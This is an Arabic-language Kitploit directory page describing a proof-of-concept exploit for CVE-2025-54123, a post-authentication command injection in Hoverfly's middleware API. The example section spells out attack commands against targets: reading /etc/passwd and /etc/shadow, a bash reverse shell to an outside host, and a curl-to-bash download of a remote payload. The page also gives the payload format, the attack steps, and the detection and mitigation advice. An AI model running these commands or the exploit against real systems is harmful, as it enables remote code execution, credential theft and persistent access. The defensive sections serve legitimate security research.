Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly حقن أوامر في Middleware المُصادَق عليه (RCE) | Kitploit
أدوات/GitHubGitHub/kasem545/cve-2025-54123-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly حقن أوامر في Middleware المُصادَق عليه (RCE)

عرض المستودع
72منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-54123

حقن أوامر في الوسيط (Middleware) بعد المصادقة في Hoverfly يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) | CVSS 9.8 حرجة

الثغرة

الإصدارات Hoverfly <= 1.11.3 معرّضة لحقن الأوامر بعد المصادقة عبر نقطة النهاية /api/v2/hoverfly/middleware. يُشترط امتلاك بيانات اعتماد المسؤول، لكن بمجرد المصادقة، تقبل وظيفة الوسيط قيمًا ثنائية وسكربتات مقدمة من المستخدم دون تحقق، مما يسمح بتنفيذ أوامر عشوائية.

سلسلة الثغرة

  1. تحقق غير كافٍ من المدخلات - يقبل middleware.go مسارات ثنائية عشوائية
  2. تنفيذ أوامر غير آمن - يمرر local_middleware.go مدخلات المستخدم مباشرة إلى exec.Command()
  3. تنفيذ فوري - ينفذ hoverfly_service.go الوسيط أثناء التحقق

المتطلبات

  • بيانات اعتماد مسؤول Hoverfly صالحة (اسم المستخدم/كلمة المرور)
  • الوصول إلى Hoverfly Admin API (المنفذ الافتراضي 8888)

الاستخدام

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - نقطة نهاية Hoverfly API (مطلوب)
  • -u, --username - اسم مستخدم المسؤول (مطلوب)
  • -p, --password - كلمة مرور المسؤول (مطلوب)
  • -c, --command - الأمر المراد تنفيذه (مطلوب)
  • --shell - ملف الشل الثنائي المستخدم (الافتراضي: /bin/bash)

أمثلة

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

تسلسل الهجوم

  1. يصادق المهاجم باستخدام بيانات اعتماد مسؤول صالحة (Basic Auth)
  2. يرسل طلب PUT إلى /api/v2/hoverfly/middleware بحمولة خبيثة
  3. يكتب Hoverfly السكربت إلى ملف مؤقت /tmp/hoverfly_<random>
  4. أثناء التحقق، ينفّذ: <shell> /tmp/hoverfly_<random>
  5. تُعاد مخرجات الأمر في قسم STDOUT من استجابة الخطأ
  6. يستخرج الاستغلال المخرجات ويعرضها

بنية الحمولة

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

تتضمن ترويسات HTTP ما يلي:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

التأثير

  • تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE) بصلاحيات عملية Hoverfly
  • سرقة بيانات الاعتماد - سرقة مفاتيح API والرموز المميزة والأسرار
  • التنقل عبر الشبكة الداخلية (Pivot) - اختراق الأنظمة المجاورة
  • تسريب البيانات (Exfiltration) - الوصول إلى بيانات المحاكاة والإعدادات
  • الثبات (Persistence) - تثبيت أبواب خلفية والحفاظ على الوصول
  • تعطيل الخدمة - تعديل/حذف إعدادات الوسيط

مواقع الكود الضعيفة

  • core/middleware/middleware.go:94-96 - لا يوجد تحقق من المدخلات على معامل binary
  • core/middleware/local_middleware.go:14-19 - استخدام غير آمن للدالة exec.Command()
  • core/hoverfly_service.go:173 - تنفيذ فوري أثناء التحقق

الإصدارات المتأثرة

  • Hoverfly <= 1.11.3
  • جميع التثبيتات التي يكون فيها Admin API متاحًا للوصول مع تفعيل المصادقة

الاكتشاف

ابحث عن:

  • طلبات PUT الموجهة إلى /api/v2/hoverfly/middleware
  • استجابات خطأ تحتوي على "STDOUT:" مع مخرجات الأوامر
  • ملفات مؤقتة في /tmp/hoverfly/
  • عمليات تنفيذ غير طبيعية من خدمة hoverfly

التخفيف

  • الترقية إلى إصدار مصحح (إن توفّر)
  • تقييد الوصول إلى Admin API بعناوين IP موثوقة فقط
  • استخدام بيانات اعتماد مصادقة قوية
  • مراقبة الوصول إلى نقطة النهاية /api/v2/hoverfly/middleware
  • تطبيق تحقق من المدخلات على معاملي binary/script

المراجع

  • CVE-2025-54123
  • CWE-78 (حقن أوامر نظام التشغيل)
  • CWE-20 (تحقق غير سليم من المدخلات)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

الاعتمادات

الاكتشاف الأصلي: @Kr1shna4agarwal

تنزيل الأداة